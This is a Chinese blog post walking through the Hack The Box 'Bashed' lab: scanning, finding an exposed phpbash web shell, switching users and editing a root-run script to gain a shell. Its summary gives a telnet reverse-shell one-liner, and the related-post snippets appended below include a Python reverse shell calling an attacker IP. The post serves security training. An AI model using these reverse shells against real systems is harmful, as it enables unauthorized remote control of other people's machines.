hack the box靶场练习之bashed

最新推荐文章于 2025-08-18 10:55:21 发布
原创 最新推荐文章于 2025-08-18 10:55:21 发布 · 360 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全 #web安全

文章描述了一次网络安全实践过程,从端口扫描发现开放的80端口和Apache服务器开始,通过目录遍历找到敏感文件,利用PHP获取控制台权限,尝试切换用户并修改脚本以反弹shell,最终达到权限提升并读取用户和root的TXT文件内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

练习记录

进入主页启动机器:
在这里插入图片描述
对该IP进行端口扫描:
在这里插入图片描述
发现有个80端口,开启了apache httpd2.4.18,访问一下:
在这里插入图片描述
扫一下目录:
在这里插入图片描述
逐个访问后发现在/dev目录下有如下内容:
在这里插入图片描述
访问phpbash.php可得到一个在线的控制台程序
在这里插入图片描述
查询当前用户名:
在这里插入图片描述
查看可以执行sudo的用户或命令:
在这里插入图片描述
发现此处存在一个叫scriptmanager的用户。
尝试获取一个可交互式shell
在这里插入图片描述
在这里插入图片描述
切换用户:

在这里插入图片描述
切换到根目录,查看目录信息:
在这里插入图片描述
发现其中多出了一个叫scripts的目录 打开看看:
在这里插入图片描述
在这里插入图片描述
发现就是个生成txt文档的脚本,尝试修改改脚本使其反弹shell,然后用python运行:
在这里插入图片描述
同时开启nc的4444端口监听:
在这里插入图片描述
最后翻找目录获得user.txt和root.txt,读取内容:
在这里插入图片描述

在这里插入图片描述

总结

1.不同目录的操作权限不同,所以可以多尝试不同目录不同文件,以求获取更高权限。
2.在python、php、bash反弹shell失败后可以尝试telnet:mknod a p; telnet <ip> <port> 0<a | /bin/bash 1>a

HackTheBox-Bashed渗透测试
weixin_43111940的博客
04-13 390
端口信息,只开了80端口 目录扫描 gobuster dir -u http://10.10.10.68 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x 'html,php,asp,aspx,zip,rar' /dev/目录下有php的shell文件 通过执行命令可以判断是Linux系统,因为对命令的大小写敏感 既然可以执行命令,尝试一下用反弹shell命令,尝试了php,Linux的反弹命令,但是没有拿到she
HTB靶场系列 Linux靶机 Bashed靶机
m0_57221101的博客
01-10 1437
勘探 惯例先用nmap扫描一下端口,发现开了80端口 ┌──(root????Mr)-[~/dirsearch] └─# nmap 10.10.10.68 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 14:30 CST Nmap scan report for 10.10.10.68 Host is up (1.2s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/
Bashed -- hack the box
neal1991的专栏
04-04 582
IntroductionTarget: 10.10.10.68 (OS: Linux)Kali linux: 10.10.16.44Information Enumera...
Hack the box靶机 bashed
菜浪马废的博客
05-07 435
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subp...
HackTheBox::Bashed
aya3t的博客
10-11 522
HackTheBox::Bashed
靶场提权小全
m0_57221101的博客
02-08 4011
说是linux提权但在整理的时候不自主的把windows的内容也写了进去,结果变成了大杂烩,也不知道是好还是不好你 https://github.com/sagishahar/lpeworkshop Windows提权: ​FuzzySecurity | Windows Privilege Escalation Fundamentals ​https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalatio..
murmurhash.c:MurmurHash3通用hash bashed查找函数实现
06-20
MurmurHash3通用hash bashed查找函数实现 关于 是一种非加密哈希函数,适用于一般的基于哈希的查找。 此实现实现了 MurmurHash 的第 3 版。 安装 : $ clib install jwerle/murmurhash.c 来源: $ git clone git@...
C1 Week 1:(2)Linear Regression with One Variable
不蒸馒头的博客
01-22 1087
>Reg->Reg->->->for y.->->->The->->->->->->->->->->->->->->->->->->->->->->->->->Hopefully,->->->->->->【Optional】->->->->->->->————​​​​​​​——
HTB-hackthebox-Bashed
yutianovo的博客
03-01 583
靶机描述 清单 信息搜集 nmap dirsearch 未受到保护的危险php文件 提权 sudo -l 定时脚本 信息搜集 靶机IP 端口扫描 nmap 10.10.10.68 Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http 80 页面内容如下 介绍了 phpbash https://github.com/Arrexel/phpbash 功能是在 Web 页面里可以像交互式shell 一样进行
hackthebox-bashed (考点:phpbash,linux修改脚本)
冬萍子癸水
04-11 678
nmap 就一个80. 打开看看都很直白提示了是phpbash 拿dirbuster扫一扫 看到phpbash,点进去。进入网页版bash 把这个shell弹到我本机来 命令有很多,但我试了几个没反应 最后这个OK python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);...
Haystack - hack the box
neal1991的专栏
11-30 695
Introduction Target: 10.10.10.115(Linux) Kali: 10.10.16.61 HayStack is an easy box in hack the box. But it does isn't easy at all. It's annoying to find the user and password in the messy Spanis...
hackthebox Sau靶场通关记录 | request baskets漏洞 | maltrail漏洞 | systemctl提权
zrk3034197094的博客
07-19 3111
hackthebox靶场Sau,request basketsSSRF漏洞,maltrail漏洞远程命令执行,systemctl sudo提权
Hackthebox靶场---Undetected 攻略实战(难)
weixin_51339377的博客
04-24 4460
正常思路 nmap进行端口扫描 发现开放了80和22端口 网站进入80端口 是一个珠宝网站 发现点击store会重定向到其他的url http://store.djewelry.htb/ 我们首先用dirsearch扫描一下 然而并没有发现什么有用的,也跟基本主界面测试差不多 除了store可能有可以利用的地方 我们不妨把这个未知url的地址也dns解析到这个ip地址 执行以下命令即可 echo 10.10.11.146 djewelry.htb store.dj...
Crafty - hackthebox
tanbinn的博客
05-21 1049
hackthebox的Crafty靶场
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 2263
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
渗透测试练习靶场hackthebox——Starting Point Pathfinder攻略(详细版本)
weixin_42109829的博客
09-08 4872
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
PGP: Born2Root
m0_57221101的博客
05-16 347
Generally , This target seems really easy . It is like a personal PC pentest but unfortunately I had never to think about how to attack a personal PC . And the author likes set rabbit hole very much . Scan It opened three ports 22,80,111 Without 111 ,
hackTheBox——moneybox靶场练习
weixin_73942557的博客
10-28 125
查看sudo -l命令查看这个命令就是非root用户但是可以使用这个权限。但是这里有个坑不要按照平常的思维找文件,地三个的文件名不一样。直接访问这个路径下面的就能够查看到flag。刚刚还翻译给的是太长了我就懵了,然后现在。漏洞三、存在lily用户存在私钥泄露登录。利用history查看历史命令发现了。利用这个文件直接写一个反弹shell。然后解密一下试试得到了这个东西。他说我的密码太弱了让我改一下。端口存在的问题和风险点。漏洞一、ftp弱口令。漏洞二、ssh弱口令。漏洞四、sudo提权。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8753
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
桥梁安全监测主要方法和内容
最新发布
weixin_48039531的博客
08-18 532
随着使用年限的增长、交通流量的增加以及自然环境的侵蚀,桥梁结构可能出现老化、疲劳、裂缝等问题,严重时甚至引发坍塌事故。现代桥梁安全监测通常结合传感器技术、物联网、大数据分析等手段,对桥梁的应力、变形、振动、温度等关键参数进行长期跟踪,从而实现对桥梁性能的全面评估和预警。█传感器监测法:在桥梁关键部位安装应变计、加速度计、位移传感器等设备,实时采集桥梁的应力、振动、变形等数据。█环境因素监测法:记录温度、湿度、风速、交通荷载等外部环境数据,分析其对桥梁性能的影响,并建立相关性模型以预测未来状态。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值